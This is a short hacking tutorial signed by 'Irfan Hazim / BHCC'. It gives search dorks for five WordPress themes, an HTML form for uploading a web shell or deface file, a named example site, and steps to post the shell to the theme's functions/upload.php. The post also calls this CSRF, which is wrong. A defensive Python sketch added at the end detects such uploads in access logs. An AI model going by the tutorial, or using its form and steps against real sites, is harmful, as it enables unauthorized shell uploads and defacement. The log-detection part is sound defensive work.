Hi, I'm Irfan Hazim,
Today I want to teach you about CSRF. Of all the many methods, this one is the most effective :3
Actually, CSRF, that is Cross Site Request Forgery, also known as SideJacking or Click-Attack, is a kind of malicious code. Many websites fail to protect against it because of a lack in the web development community, and any web application without built-in CSRF controls is exposed.
Here is the dork.
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
Pick one :) Exploit:
<form enctype="multipart/form-data" action="http://localhost" method="post">
<input type="jpg" name="url" value="./" /><br />
Pilih File Deface / Shell Anda: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
By BHCC/Irfanl
Copy that code
and save it as csrf.html.
Done? Don't skip ahead ~ Open the site you picked, for example: http://www.mswcp.org/wp-content/themes/shepard/images/jPlayer/
Remove images/jplayer
Then type /functions/ and look there. If there is an uploadify.php, upload.php or upload-bg.php, open it. If it shows an error, that means it is VULN!
After that, take the script from earlier, remove localhost and put in http://www.mswcp.org/wp-content/themes/shepard/functions/upload.php. Then save, open the file and upload the shell :)
AFTER THAT, HAVE YOUR WAY WITH IT AS MUCH AS YOU LIKE. :P Sorry if the language is a bit crude.
~ By Irfan Hazim / BHCC. If you don't understand, search for me on FB: fb.com/frostbrake
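Seen from the defender's side, the steps above leave a clear trace in the web server's access log: a request to a theme's functions/ upload script, then a multipart POST to it. The following detection sketch is an added example, not part of the original post; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Upload scripts the post names, under a theme's functions/ directory.
SCRIPT_RE = re.compile(
    r"^/wp-content/themes/(?P<theme>[^/]+)/functions/"
    r"(?P<script>uploadify|upload-bg|upload)\.php(?:\?.*)?$", re.IGNORECASE)
# Combined log format (assumed): ip - user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b')

def find_theme_upload_hits(lines):
    """Group requests to theme upload scripts by client IP."""
    hits = defaultdict(lambda: {"probes": [], "uploads": []})
    for line in lines:
        m = LOG_RE.match(line)
        s = SCRIPT_RE.match(m["path"]) if m else None
        if not s:
            continue  # unparseable line or unrelated path
        event = (m["ts"], s["theme"].lower(), s["script"].lower() + ".php", int(m["status"]))
        kind = "uploads" if m["method"] == "POST" else "probes"
        hits[m["ip"]][kind].append(event)
    return dict(hits)

def accepted_uploads(hits):
    """IPs whose POST got a 2xx: the script ran, so a file may have been written."""
    return sorted(ip for ip, h in hits.items()
                  if any(200 <= e[3] < 300 for e in h["uploads"]))

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2014:13:55:01 +0000] "GET /wp-content/themes/shepard/functions/upload.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2014:13:55:40 +0000] "POST /wp-content/themes/shepard/functions/upload.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2014:14:02:11 +0000] "GET /wp-content/themes/money/functions/uploadify.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Oct/2014:14:05:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2014:14:09:30 +0000] "POST /wp-content/themes/clockstone/functions/upload-bg.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = find_theme_upload_hits(SAMPLE)
    for ip in accepted_uploads(hits):
        print(ip, hits[ip]["uploads"])
```

A 2xx response to the POST is the case to triage first: check the theme and uploads directories for files created at that timestamp, and remove or restrict the standalone upload script.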